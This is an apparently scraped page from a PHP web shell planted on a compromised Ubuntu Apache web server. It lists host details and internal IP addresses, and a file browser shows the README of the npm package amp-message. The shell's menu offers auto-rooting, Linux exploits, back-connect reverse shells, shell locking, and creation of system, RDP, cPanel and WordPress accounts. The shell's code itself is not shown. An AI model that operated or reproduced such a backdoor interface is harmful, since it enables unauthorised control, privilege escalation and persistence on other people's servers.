Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
amp-message /
[ HOME SHELL ]
Name
Size
Permission
Action
Readme.md
1.42
KB
-rw-rw-r--
index.js
2.37
KB
-rw-rw-r--
package.json
453
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Readme.md
# amp-message High level [AMP](https://github.com/visionmedia/node-amp) `Message` implementation for manipulating, encoding and decoding AMP messages. ## Installation ``` $ npm install amp-message ``` ## Example Encoding a message: ```js var Message = require('amp-message'); var msg = new Message; console.log(msg.toBuffer()); // => <Buffer 10> msg.push('foo'); msg.push('bar'); msg.push('baz'); console.log(msg.toBuffer()); // => <Buffer 13 00 05 73 3a 66 6f 6f 00 05 73 3a 62 61 72 00 05 73 3a 62 61 7a> msg.push({ foo: 'bar' }); console.log(msg.toBuffer()); // => <Buffer 14 00 05 73 3a 66 6f 6f 00 05 73 3a 62 61 72 00 05 73 3a 62 61 7a 00 0f 6a 3a 7b 22 66 6f 6f 22 3a 22 62 61 72 22 7d> msg.push(new Buffer('image data')); console.log(msg.toBuffer()); // => <Buffer 15 00 05 73 3a 66 6f 6f 00 05 73 3a 62 61 72 00 05 73 3a 62 61 7a 00 0f 6a 3a 7b 22 66 6f 6f 22 3a 22 62 61 72 22 7d 00 0a 69 6d 61 67 65 20 64 61 74 ... > ``` Decoding a message: ```js var Message = require('..'); var msg = new Message; msg.push('foo') msg.push({ hello: 'world' }) msg.push(new Buffer('hello')) var other = new Message(msg.toBuffer()); console.log(other.shift()); console.log(other.shift()); console.log(other.shift()); ``` ## API ### Message Initialize an empty message. ### Message(buffer) Decode the `buffer` AMP message to populate the `Message`. ### Message(args) Initialize a messeage populated with `args`. # License MIT
Close